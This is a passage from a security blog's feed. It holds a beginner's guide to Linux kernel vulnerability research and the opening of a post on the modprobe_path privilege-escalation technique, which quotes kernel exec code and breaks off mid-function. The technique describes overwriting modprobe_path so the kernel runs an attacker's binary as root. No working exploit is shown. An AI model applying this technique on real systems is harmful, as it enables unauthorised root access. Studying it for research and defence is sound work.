14:07:40 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/08/confused_girl.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/08/confused_girl.gif" alt="So You Wanna Pwn The Kernel?"><p>Initially I was going to write the next instalment of the Linternals: Virtual Memory series after getting back from <a href="https://conference.hitb.org/hitbsecconf2022sin/">HITB2022SIN</a>, but after a number of offline and online conversations it seems like this could help a number of you out, so let&apos;s give it a go!</p><p>My aim for this post is to provide some insights into getting into Linux kernel <strong>v</strong>ulnerability <strong>r</strong>esearch and <strong>e</strong>xploit <strong>d</strong>evelopment (VRED), although I&apos;m sure some of this will be transferable to similar areas.<sup>[1]</sup></p><p>Sounds fairly straightforward, right? Well, much like the process of writing a kernel exploit, diving into this can also open-ended and confusing. There are many approaches and a wealth of resources out there, with no clearly defined path to follow.</p><p>Is this post going to pave that clearly defined path? Probably not. We all learn in different ways, have different experiences, motivations and goals. Hopefully, however, I can help demystify this topic a bit for you and give you the tools necessary to pave the right path for you.</p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#overview">Overview</a></li>
<li><a href="#mindset">Mindset</a>
<ul>
<li><a href="#motivation">Motivation</a></li>
<li><a href="#curiosity">Curiosity</a></li>
<li><a href="#perseverance">Perseverance</a></li>
<li><a href="#ego">Ego</a></li>
</ul>
</li>
<li><a href="#approaches">Approaches</a>
<ul>
<li><a href="#reading">Reading</a></li>
<li><a href="#videos">Videos</a></li>
<li><a href="#projects">Projects</a></li>
</ul>
</li>
<li><a href="#workflow">Workflow</a>
<ul>
<li><a href="#tooling">Tooling</a></li>
<li><a href="#organisation">Organisation</a></li>
<li><a href="#staying-up-to-date">Staying Up-To-Date</a></li>
<li><a href="#having-a-gameplan">Having a Gameplan</a></li>
</ul>
</li>
<li><a href="#resources">Resources</a>
<ul>
<li><a href="#ctfs">CTFs</a></li>
<li><a href="#reading-materials">Reading Materials</a></li>
<li><a href="#tools">Tools</a></li>
<li><a href="#video-materials">Video Materials</a></li>
</ul>
</li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<!--kg-card-end: markdown--><hr><ol><li>For a more general post on demystifying security research, I absolutely recommend a post of the same title by <a href="https://twitter.com/alexjplaskett">Alex Plaskett</a> <a href="https://alexplaskett.github.io/demystifying-security-research-part1/">here</a>, which touches on similar themes</li></ol><h2 id="overview">Overview</h2><p>As I mentioned above, linux vred is a complex and constantly evolving topic. So as you might imagine, trying to write an accessible, usable introduction to this topic has it&apos;s own challenges. But we gotta try!</p><p>The first thing I want to cover is <strong>mindset</strong>. Yeah, I get it, sounds wishy-washy and inactionable, but I think it will help to talk a bit about some useful mindset tips for approaching work like this and avoiding burnout. </p><p>Then I&apos;ll move onto talking about <strong>approaches</strong> you can take to begin your journey down the rabbit hole that is linux vred and hone your skills. Again, worth highlighting here that these are just suggestions from my experiences and are non-exhaustive.</p><p>I&apos;ll briefly touch on my <strong>workflow</strong> and some of the tooling I find useful, again this is really personal preference, but may be helpful as a starting point. Plus I always find it interesting to hear what cool tools and workflows other people use! </p><p>Finally I&apos;ll wrap things up with a list of <strong>resources</strong>, this will be far from exhaustive as well, but hopefully I&apos;ll get a decent amount of stuff in there!</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/08/we_got_this.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="262"></figure><h2 id="mindset">Mindset</h2><h3 id="motivation">Motivation</h3><p>At risk of sounding like one of those YouTube motivational speakers, one of the first things you want to understand is your motivation for getting into this.</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x1F4A1;</div><div class="kg-callout-text">Do you love understanding things and then breaking them? Do you use Linux daily and finally want to get back at it? Do you want to pivot from exploiting a different platform? Did you watch the movie Blackhat (2015)? Do you want a new hobby to keep you up till 4am?</div></div><p>Whatever your motivation, it&apos;s important to go into this with the understanding that this is a long journey, you (probably) won&apos;t be pwning kernels overnight! In fact, you&apos;ll never understand everything. There will be many &quot;failures&quot; and hurdles along the way.</p><p>But that&apos;s okay! Actually, it&apos;s more than okay, that means you&apos;re (probably) doing it right! Though, I&apos;d be lying if I said this cycle of learning and &quot;failure&quot; with the occasional success wasn&apos;t a magnet for burnout and motivational humps.</p><p>However, by understanding your motivations and goals, as well as what you&apos;re getting into, these motivational humps can be more manageable and infrequent. </p><p>In terms of managing these humps, try where possible to prioritise working on things you enjoy and are interested in. Not only will it be better for your mental health, but you&apos;ll also likely find yourself more productive. </p><p>Due to the open-ended and exploratory nature of vred, you&apos;re not gonna have a good time trying to innovate and seek out solutions if you&apos;re completely unmotivated to do so. For the same reason, having some structure and milestones associated with tasks also helps prevent feelings of aimless drifting or getting overwhelmed. </p><p>Like I said though, these humps aren&apos;t always avoidable and are managed differently by different people, so I won&apos;t pretend to know the answers. For example, a common recommendation, and one I use, is to remember to context switch! </p><p>If you&apos;ve been bashing your head against the keyboard for some months, neck-deep in C source code trying to find a particular primitive, sometimes it can help to take a pause. Go write that Python tool you&apos;ve been meaning to. No, you won&apos;t forget everything. In fact, you may come back with a fresh perspective and clear mind.</p><h3 id="curiosity">Curiosity</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/08/piqued_interest.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="400" height="225"></figure><p>Curiosity may have killed the cat, but it&apos;s a security researcher&apos;s best friend. Especially starting out, it can be tempting to rush to popping that shell. </p><p>Trust me, I&apos;ve been guilty of it many a time. You&apos;re just starting out and trying a kernel CTF and you just want to get that flag to prove you can do it, right? So you Google some techniques and you copy and paste some code, tweak some stuff and keep iterating until you get it.</p><p>But as Emerson said, &quot;It&apos;s not the destination, it&apos;s the journey&quot;. More important than popping the shell, is understanding how you popped it. The former may be a win here, but it&apos;s that deeper understanding which will net you future wins.</p><p>Be curious! Ask questions! Take your time. If you don&apos;t quite understand this technique you&apos;ve seen, spend some time playing around with it until you do. If something isn&apos;t working, spend some time getting to the root cause rather than jumping straight to another approach. </p><p>This fundamental understanding you&apos;ll develop by being curious is a lot more flexible and applicable to future projects than a surface level awareness of potential techniques or approaches. </p><h3 id="perseverance">Perseverance</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/08/frustrated.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="356" height="200"></figure><p>I&apos;ve touched on this a few times now: kernel VRED is both complex and open-ended. Not only is there no clear path to winning, sometime&apos;s there is no path at all. </p><p>There might not be a bug in that module you&apos;ve been looking at or a way to elevate your privileges with that heap overflow. Again, that&apos;s okay, it&apos;s normal!</p><p>Being able to persevere in the face of regular hurdles and dead-ends is key. An important aspect of this is defining &quot;success&quot; and &quot;failure&quot;. I&apos;ve thrown the F word around a few times so far, and been mindful to put it in quotes.</p><p>Just because you&apos;ve spent months searching for a bug in a kernel module and come up with nothing, doesn&apos;t mean you&apos;ve failed. During that time you&apos;ve likely deepened your understanding of the kernel, improved your workflow, come up with tooling etc.</p><p>All of these are things which can help you &quot;win&quot; going forward, so yes while perseverance is key when you hit these roadblocks and dead-ends, also try not to just see them as failures! </p><p>It&apos;s also worth noting, the flip side of this is knowing when to call it quits. Later in in the workflow section, I talk about having a gameplan for approaching vred tasks. Such that when you&apos;ve exhausted your gameplan, you know it&apos;s time to move on. </p><h3 id="ego">Ego</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/08/got_no_idea.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="640" height="360"></figure><blockquote>&quot;your idea or opinion of yourself, especially your feeling of your own importance and ability&quot; - Cambridge Dictionary on &quot;ego&quot;</blockquote><p>Ego plays a big role in our industry, and fortunately is something that is spoken about more these days. And no I&apos;m not talking about inflated egos (yet), but <a href="https://www.dictionary.com/browse/impostor-syndrome#:~:text=noun%20Psychology.,luck%20or%20other%20external%20forces.">imposter syndrome</a>. </p><p>In the beginning, you may come into this field finding things extremely daunting and overwhelming. After all, the kernel is huge and complicated and there&apos;s so many super smart people out there publishing some amazing work!</p><p>For many of us, this feeling never goes away. Myself included! I recently did my first conference talk at HITB2022SIN, and I was anxious for weeks in the build up despite the topic being something I worked on for months and was super familiar with. </p><p>Part of this was to do with public speaking, but part was worrying about the quality and validity of my work in the eyes of peers. What if it was all horribly wrong?!</p><p>So this section is just to reassure that if you feel this, it&apos;s okay, you&apos;re not alone! While this is common, try not to let it get on top of you! My main advice here would be that the only person you should be comparing yourself with is yourself a year or so ago<sup>[1]</sup> :)</p><p>The flip side to this, of course, is that I think it&apos;s good to maintain a level of humility. This is a field that is constantly evolving and you&apos;ll never know it all. Furthermore, due to the complexity of some this stuff, you might not have a complete understanding. This is all okay, just be open, and happy even, to adjust that understanding.</p><hr><ol><li>Totally arbitrary number of course, as you may have taken a break and been working in other areas, but you get the gist of what I mean</li></ol><h2 id="approaches">Approaches</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/08/sausage_hands.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="240"></figure><p>Alright, let&apos;s move onto some hands on advice! Hopefully now I&apos;ve instilled some of mindset involved in getting into kernel vred stuff, time to put it to good use!</p><p>As has been a running theme here, there&apos;s many different approaches to get stuck into this and we all approach learning in different ways. I&apos;ve tried to provide a variety of options here, though this is far from an exhaustive list. </p><p>Feel free to experiment, mix-and-match and see what works best for you! To throw in my 10 cents: I have found hands-on projects by far the best method to develop a working understanding of new stuff, supplementing this with some reading. </p><h3 id="reading">Reading</h3><p>Okay, so the bread-and-butter for learning about kernel vred stuff is going to be reading; there&apos;s a wealth of blog posts and publications out there on a range of topics.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/head_tv.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="500" height="281"></figure><p>Not sure what else to say about this, other than that the hardest part here is curating and finding these readings. Contributors can vary from hobbyists, professional research and academic research - all being hosted in different places by different people. </p><p>Beyond the customary &quot;use Twitter&quot; for your infosec needs, I&apos;ve also included a link in the resources below to a great repo called <a href="https://github.com/xairy/linux-kernel-exploitation">Linux Kernel Exploitation</a> maintained by<a href="https://twitter.com/andreyknvl"> @andreyknvl</a> which contains a pretty thorough list of reading materials. </p><p>Coming into this, the amount of materials out there may be overwhelming. I&apos;d just suggest starting with stuff immediately relevant to what you&apos;re working on/interested in. E.g. if you want to try write a local priv esc, then read some recent LPE write-ups.</p><p>Also remember <strong>curiosity</strong> and <strong>perseverance</strong>. Some/most/all of this stuff may be utter gibberish at first, and that&apos;s fine. Especially with VRED write-ups, each bug and exploit will have it&apos;s own specific nuances which will be foreign to even experienced folks reading them for the first time. </p><p>Just remember to take your time to pause and follow up each bit you don&apos;t understand, even if it leads you down another rabbit hole, until you can piece it together. </p><p>Also another disclaimer that not everyone who takes the time to share their work is a NYT best seller, graphics designer or native English speaker!</p><h3 id="videos">Videos</h3><p>If you&apos;re more of a visual learner, the options are a bit more limited but not non-existent. Besides my GIFs and occasional diagrams, there is a reasonable amount of recorded conference talks available on YouTube.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/tv_popcorn.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="500" height="359"></figure><p>Again, the problem here becomes trying to find which conferences to checkout for content, because some of these may not index well and may not have a tonne of views. In the <strong>Resources</strong> section below, I&apos;ll include a list of con channels to get you started.</p><p>I&apos;m sure there&apos;s probably some great content creators out there pumping out videos, but as that&apos;s not my preferred media I&apos;m afraid I can&apos;t help much there. If you know of any I can plug here who make vids on Linternals / VRED then @ me pls.</p><h3 id="projects">Projects</h3><p>I feel like theory can only get you so far and if you&apos;re interested in doing some kernel vred, you&apos;re going to need to get your hands dirty at some point anyway!</p><p>By getting some hands on, you&apos;re able to put into practice the techniques and understanding you&apos;ve gained from your research. Furthermore, sometimes the best way to understand something in the kernel is to get in the debugger and take a peak yourself.</p><p>However, it&apos;s one thing to be told &quot;just get some hands on experience!&quot; and another to actually know where to start, especially if you&apos;re completely new to this.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/not_sure_where_to_start.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="270"></figure><p>As a result, I&apos;ll include some ideas and starting points for potential projects here. You&apos;ll find the more you get into things, the more ideas you&apos;ll have for your own tooling or experiments as you go on:</p><ol><li>A core part of kernel vred is, of course, understanding the kernel, so one project idea could be try and write your own kernel driver and play around with some features (reading input for userspace via IOCTLs, allocating memory etc.)</li><li>Follow along with exploit write-ups! Find a local privilege escalation write-up you like (maybe with source available) and try follow it along and get it running in a VM; again taking the time to understand the how&apos;s and why&apos;s of what&apos;s going on</li><li>Taking this a step further, you could try the above without source or even without a write-up by looking at some CVE&apos;s. Alternatively, piggy-backing off of idea 1 you could write your own vulnerable driver and exploit that :) </li><li>CTFs are of course another popular way to test your kernel vred mettle, and I&apos;ll provide some links in the resources to some below.</li><li>Tooling! Writing tooling to improve your kernel vred workflow or even just to explore kernel internals can be great way to develop that fundamental understanding. Don&apos;t worry if you don&apos;t have ideas right now, trust me you will!</li><li>Posting your own write-ups or analysis! When I started this blog, I actually never intended for anyone to see it, it was just a way to motivate myself to look into various topics and refine my understanding on them via writing accessible posts</li></ol><h2 id="workflow">Workflow</h2><p>Now onto the less glamorous, but just as fundamental part: workflow. I appreciate this is highly preference based, so this is more for reference and because I also find it interesting to hear about other people&apos;s workflows.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/behold_my_stuff.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="270"></figure><p>Your workflow is something that will likely constantly evolve, refined over an iterative process of discovering new tools and deeper understanding of your own preferences, strengths and weaknesses. Don&apos;t be afraid to try new things! :) </p><h3 id="tooling">Tooling</h3><p>For my <strong>IDE</strong>, I use &quot;a configuration framework for <a href="https://www.gnu.org/software/emacs/" rel="nofollow">GNU Emacs</a>&quot; called <a href="https://github.com/doomemacs/doomemacs">Doom</a>. It&apos;s very easy to setup (and tweak) and the default settings are pretty good. I actually found this project thanks to a great talk, &quot;<a href="https://www.youtube.com/watch?v=heib48KG-YQ&amp;ab_channel=linux.conf.au">Kernel Hacking Like It&apos;s 2020</a>&quot; by Russell Currey.</p><p>If you&apos;re interested in finding out more about Doom Emacs, there&apos;s <a href="https://www.youtube.com/playlist?list=PLhXZp00uXBk4np17N39WvB80zgxlZfVwj">a cool playlist</a> on YouTube to get you started by <a href="https://www.youtube.com/c/ZaisteProgramming">Zaiste Programming</a>.</p><p>Another cornerstone of my workflow is <strong>virtualisation</strong>. Whenever I&apos;m writing up a new exploit or doing some testing, I&apos;ll be spinning up a representative target VM<sup>[1]</sup>. My tool of choice here is <a href="https://www.qemu.org">QEMU</a>; I find it to be lightweight and very flexible (and it&apos;s free and open-source!). &#xA0;</p><p>The last part of the tooling trifecta for me: the <strong>debugger</strong>. Perhaps unsurprisingly I&apos;m regularly neck-deep in <a href="https://www.google.com/search?q=gdb&amp;sourceid=chrome&amp;ie=UTF-8">gdb</a><sup>[2]</sup>. Despite being quite literally older than me, it still holds up. That said, addons like <a href="https://github.com/hugsy">hugys</a>&apos;s <a href="https://github.com/hugsy/gef">GEF</a> (GDB Enhanced Features) makes life easier.</p><h3 id="organisation">Organisation</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/deaf.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="270"></figure><p>AKA Documentation. Yep, I said it. But no, I&apos;m not talking about carefully curated and margin-tweaked executive reports or several hundred page long technical specifications. </p><p>I can&apos;t stress enough how much future you will thank yourself if you get into the habit of documenting your work early on. It doesn&apos;t have to be anything fancy, I just use markdown + git. Just make sure there&apos;s some semblance of order and that it&apos;s going to be easy for you to hunt down and refer back to later.</p><p>You will accumulate <strong><em>a lot </em></strong>of knowledge during your research and you won&apos;t be able to retain all of it, nor will all of it be immediately useful. But having it neatly documented and easy to reference means that when you have to go back to it, you can. It also just helps to reinforce knowledge and understanding too.</p><p>Whether it&apos;s coming back to a kernel module you&apos;ve previously done work on and want a refresher, or if you found a heap shaping primitive in a previous CTF that would be a perfect fit for the one you&apos;re working on now - having notes to refer back to is a life saver. </p><h3 id="staying-up-to-date">Staying Up-To-Date</h3><p>Another useful part of your workflow to consider is keeping up-to-date with the latest kernel gossip. It seems like every week there&apos;s a new write-up or poc dropping and it can be a lot to keep up with, especially when they&apos;re from all over the place.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/gossip.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="270"></figure><p>When I first asked a colleague how they found all these papers and write-ups, they replied Twitter and I scoffed. Surely not? But lo and behold, several years later I can confirm Twitter is still probably the best means to find this kind of content. It is what it is.</p><p>Alternatively of course, you can try to curate your own feed (e.g. via RSS or Atom) from the sources themselves and use a reader to catch updates.</p><p>Another sources beyond blogs and news sites is of course mailing lists. Yep, they&apos;re still a thing. The one I mainly keep an eye on is <a href="https://www.openwall.com/lists/oss-security/2022/08/">oss-security</a> which is where you&apos;ll find public disclosures for linux kernel stuff if they went through the CVD process. </p><p>Furthermore, if you want to get granular and you&apos;re looking for specific information don&apos;t be afraid to dive into commit history or the lkml. </p><h3 id="having-a-gameplan">Having a Gameplan</h3><p>We&apos;re almost there, I promise! The last, but certainly not the least, aspect of the workflow I want to talk about is having a gameplan for approaching vred projects.</p><p>Whether it&apos;s vulnerability research or exploit development, we&apos;re dealing with inherently complex and open-ended problems, which may have no solution at all.</p><p>By approaching these problems with a structured methodology, we&apos;re able to breakdown what can seem a daunting and overwhelming task into manageable chunks. Also, if we get to the end of it and don&apos;t find that bug or pop that shell, we at least know we&apos;ve tried our best and can take what we&apos;ve learned and move onto the next task.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/gameplan.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="270"></figure><p>So instead of just diving into the problem and following each lead, I&apos;d recommended figuring out a gameplan that works for you and trying to approach these problems in and ordered, methodical way. </p><p>Again, this is something that will vary from person to person, depending on how you work. It will also likely evolve over time as you do more of this kind of work, and that&apos;s okay :) </p><p>For more concrete examples, I talk about this in my talk &quot;E&#x2019;rybody Gettin&#x2019; TIPC: Demystifying Remote Linux Kernel Exploitation&quot;. The recording isn&apos;t up yet, but you can see the slides <a href="https://conference.hitb.org/hitbsecconf2022sin/materials/D1T1%20-%20Erybody%20Gettin%20TIPC%20-%20Demystifying%20Remote%20Linux%20Kernel%20Exploitation%20-%20Sam%20Page.pdf">here</a>.</p><hr><ol><li><a href="https://sam4k.com/setting-up-a-virtualised-linux-empire-on-apple-silicon/">Setting Up A Virtualised (Linux) Empire on Apple Silicon</a></li><li><a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/">Patching, Instrumenting &amp; Debugging Linux Kernel Modules</a></li></ol><h2 id="resources">Resources</h2><p>I&apos;m already 3000 words deep so this resources section will be a work in process and is far from exhaustive. If you have additions, feel free to @ me or DM me and I&apos;ll get them in.</p><h4 id="ctfs">CTFs</h4><ul><li><a href="https://ctf.hackthebox.com">HTB</a> has some kernel pwn challenges to practice your skills with </li><li><a href="https://github.com/smallkirby" rel="author">smallkirby</a>/<a href="https://github.com/smallkirby/kernelpwn">kernelpwn</a> seems like a decent curation of some kernel pwn challenges, with a section for beginners too :) </li></ul><h4 id="reading-materials">Reading Materials</h4><ul><li>No need to reinvent the wheel, absolutely check out the awesome repo <a href="https://github.com/xairy/linux-kernel-exploitation">Linux Kernel Exploitation</a>, maintained by<a href="https://twitter.com/andreyknvl"> @andreyknvl</a>, containing a wealth of papers and write-ups</li><li><a href="https://0xax.gitbooks.io/linux-insides/content/">linux-insides</a> by <a href="https://twitter.com/0xAX">0xAX</a> is a great low-level dive into some linux internals and was an inspiration for my own <a href="https://sam4k.com/linternals-introduction/">linternals</a> series :) </li><li><a href="https://lwn.net">LWN.net</a> </li><li><a href="https://github.com/sam4k" rel="author">sam4k</a>/<a href="https://github.com/sam4k/linux-kernel-resources">linux-kernel-resources</a> is my attempt to curate some useful kernel tidbits related to compiling, debugging, instrumenting and patching the linux kernel </li></ul><h4 id="tools">Tools</h4><ul><li><a href="https://elixir.bootlin.com/linux/latest/source">bootlin&apos;s elixr cross referencer for linux source</a>; great for browsing different kernel versions with references &amp; defs in the browser</li><li><a href="https://github.com/doomemacs/doomemacs">Doom Emacs</a>, my current IDE setup</li><li><a href="https://github.com/hugsy" rel="author">hugsy</a>/<a href="https://github.com/hugsy/gef">gef</a> (GDB Enhanced Features), an addon for GDB to improve RE/xdev workflow</li></ul><h4 id="video-materials">Video Materials</h4><ul><li><a href="https://www.youtube.com/c/BlackHatOfficialYT">Black Hat</a> (YouTube)</li><li><a href="https://www.youtube.com/user/DEFCONConference">DEFCONConference</a> (Youtube)</li><li><a href="https://www.youtube.com/user/hitbsecconf">Hack In The Box Security Conference</a> (YouTube)</li><li><a href="https://www.youtube.com/c/OffensiveCon">OffensiveCon</a> (YouTube)</li></ul><h2 id="wrapping-up">Wrapping Up</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/09/itsdone.gif" class="kg-image" alt="So You Wanna Pwn The Kernel?" loading="lazy" width="480" height="270"></figure><p>Oof, that was a long one, huh? Unlike my other posts, this one has covered a particularly subjective topic. Typically the content of my posts is derived from some objective source like the Linux kernel, however this one has ultimately been the culmination of my own experiences, understanding and journey into linux vred.</p><p>That said, I hope that at least some of the insights I&apos;ve shared today have been useful for you. Not everything I&apos;ve talked about will apply to everyone, but fingers crossed there&apos;s some helpful nuggets of information in there for each of you.</p><p>As always, I love to talk about this stuff and it means a lot to be able to help inspire and motivate people on their linux-y vred-y journeys. If you have any questions, suggestions or corrections then feel free to <a href="https://twitter.com/sam4k1">@ me or DM me on Twitter</a> :) </p><h4 id="change-history">Change History</h4><p><em>I have a feeling this will see some updates and additions, so stay tuned here for any updates to the post. </em></p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Kernel Exploitation Techniques: modprobe_path]]></title><description><![CDATA[Let's kick things off with a modern day staple for local privilege escalation (LPE) in Linux Kernel Exploitation, modprobe_path. ]]></description><link>https://sam4k.com/like-techniques-modprobe_path/</link><guid isPermaLink="false">6266f59c1b5b6d052837bff4</guid><category><![CDATA[linux]]></category><category><![CDATA[VRED]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Mon, 04 Jul 2022 14:54:17 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/04/tired_computer-1.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/04/tired_computer-1.gif" alt="Kernel Exploitation Techniques: modprobe_path"><p>I thought we&apos;d kick things off with a modern day staple for local privilege escalation (LPE) in <strong>Li</strong>nux <strong>K</strong>ernel <strong>E</strong>xploitation, <code>modprobe_path</code>. </p><p>The aim of this series on exploitation techniques is to provide byte-sized (lol, sorry) analyses on specific techniques and primitives used in kernel exploitation.</p><p>Focusing on explaining why and when these techniques are used, how they work and finally touching on existing, upcoming or speculative mitigations.</p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#overview">Overview</a></li>
<li><a href="#diving-in">Diving In</a>
<ul>
<li><a href="#the-code">The Code</a></li>
<li><a href="#a-pseudo-case-study">A Pseudo Case-Study</a>
<ul>
<li><a href="#actual-examples">Actual Examples</a>
<ul>
<li>CVE-2022-27666 by <a href="https://twitter.com/ETenal7">@Etenal7</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#mitigations">Mitigations</a>
<ul>
<li><a href="#so-were-all-good">So We&apos;re All Good?</a></li>
<li><a href="#alternatives">Alternatives</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#conclusion">Conclusion</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="overview">Overview</h2><p><code><a href="https://linux.die.net/man/8/modprobe">modprobe</a></code> is a userspace program for adding and removing modules from the Linux kernel. When the kernel needs a feature that currently isn&apos;t loaded into the kernel, it can use <code>modprobe</code> to load in the appropriate module.</p><p>One example of this is when a userspace process <code><a href="https://man7.org/linux/man-pages/man2/execve.2.html"><a href="https://linux.die.net/man/3/execve">execve()</a></a></code>&apos;s a binary:</p><ol><li>the kernel will look for the appropriate binary loader</li><li>if the binary&apos;s header isn&apos;t recognised, it will attempt to load the appropriate module, specifically <code>binfmt-AABBCCDD</code>, where <code>AABBCCDD</code> represent the first 4 bytes of the binary in hex</li><li>the kernel will attempt to load the module via <code>modprobe</code>, running it as root via the absolute path stored in the titular exported kernel symbol <code>modprobe_path</code></li></ol><p>With an arbitrary address write (AAW) primitive, and address of the <code>modprobe_path</code> symbol, an attacker can overwrite <code>modprobe_path</code> to malicious binary X.</p><p>Then, by creating and executing a binary with a unknown header<sup>[1]</sup>, an unprivileged attacker can cause the kernel to go through steps 1-3 above. </p><p>Except this time, it runs the the overwritten <code>modprobe_path</code> as root, letting the attacker run malicious binary X as root, allowing for LPE. </p><hr><ol><li>Specifically, as we&apos;ll explain later, it needs to be 4 non-<code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/fs/exec.c#L1698">printable()</a></code> bytes that aren&apos;t already supported header formats </li></ol><h2 id="diving-in">Diving In</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/07/going_on_an_adventure.gif" class="kg-image" alt="Kernel Exploitation Techniques: modprobe_path" loading="lazy" width="480" height="196"></figure><p>Now that we&apos;ve got a high level overview of what we&apos;re dealing with, let&apos;s dive into some technical details as we explore the code path to executing <code>modprobe_path</code>, usecases for this techniques and how it can be leveraged by attackers. Finally we&apos;ll cover mitigations.</p><h3 id="the-code">The Code</h3><p>When we call the <code>execve()</code> family in userspace, directly or indirectly (such as running a program in your shell), it ultimately makes its way to the kernel via the <code><a href="https://man7.org/linux/man-pages/man2/execve.2.html">execve</a></code> syscall:</p><figure class="kg-card kg-code-card"><pre><code>SYSCALL_DEFINE3(execve,
		const char __user *, filename,
		const char __user *const __user *, argv,
		const char __user *const __user *, envp)
{
	return do_execve(getname(filename), argv, envp);
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c">fs/exec.c</a> (v5.18.5)</figcaption></figure><p>We&apos;ll not get too bogged down in how programs actually get run in Linux, there plenty of great content out there on the topic<sup>[1]</sup>. </p><p>What we&apos;re interested in is the fact that in order to the execute the program specified by <code>filename</code>, the kernel needs to understand what it&apos;s trying to execute. </p><p>As mentioned earlier, part of this process involves <code><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1702">search_binary_handler(struct linux_binprm *bprm)</a></code>, where <code><a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L18">struct linux_bprm</a></code> is the binary parameter struct which is used by is used by the kernel to &quot;hold the arguments that are used when loading binaries&quot;<sup>[2]</sup>.</p><figure class="kg-card kg-code-card"><pre><code>[#0] search_binary_handler(...)
[#1] exec_binprm(...)
[#2] bprm_execve(...)
[#3] do_execveat_common(...)
[#4] do_execve(...)
[#5] SYSCALL_DEFINE3(execve,...) 
[#6] userspace makes execve() syscall</code></pre><figcaption>Pseudo-backtrace up to <code>search_binary_handler()</code></figcaption></figure><p>As per the source comments, this function &quot;<em>cycle[s] the list of binary formats handler, until one recognizes the image&quot;. </em>These binary format handlers are represented by <code><a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L85">struct linux_binfmt</a></code> and are stored in the doubly linked list, <code><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L82">formats</a></code>.</p><figure class="kg-card kg-code-card"><pre><code>static int search_binary_handler(struct linux_binprm *bprm)
{
	bool need_retry = IS_ENABLED(CONFIG_MODULES);
	struct linux_binfmt *fmt;
	int retval;
    
	...
 retry:
	read_lock(&amp;binfmt_lock);
	list_for_each_entry(fmt, &amp;formats, lh) {
		if (!try_module_get(fmt-&gt;module))
			continue;
		read_unlock(&amp;binfmt_lock);

		retval = fmt-&gt;load_binary(bprm);

		read_lock(&amp;binfmt_lock);
		put_binfmt(fmt);
		if (bprm-&gt;point_of_no_return || (retval != -ENOEXEC)) {
			read_unlock(&amp;binfmt_lock);
			return retval;
		}
	}
	read_unlock(&amp;binfmt_lock);

	if (need_retry) {
		if (printable(bprm-&gt;buf[0]) &amp;&amp; printable(bprm-&gt;buf[1]) &amp;&amp;
		    printable(bprm-&gt;buf[2]) &amp;&amp; printable(bprm-&gt;buf[3]))
			return retval;
		if (request_module(&quot;binfmt-%04x&quot;, *(ushort *)(bprm-&gt;buf + 2)) &lt; 0)
			return retval;
		need_retry = false;
		goto retry;
	}

	return retval;
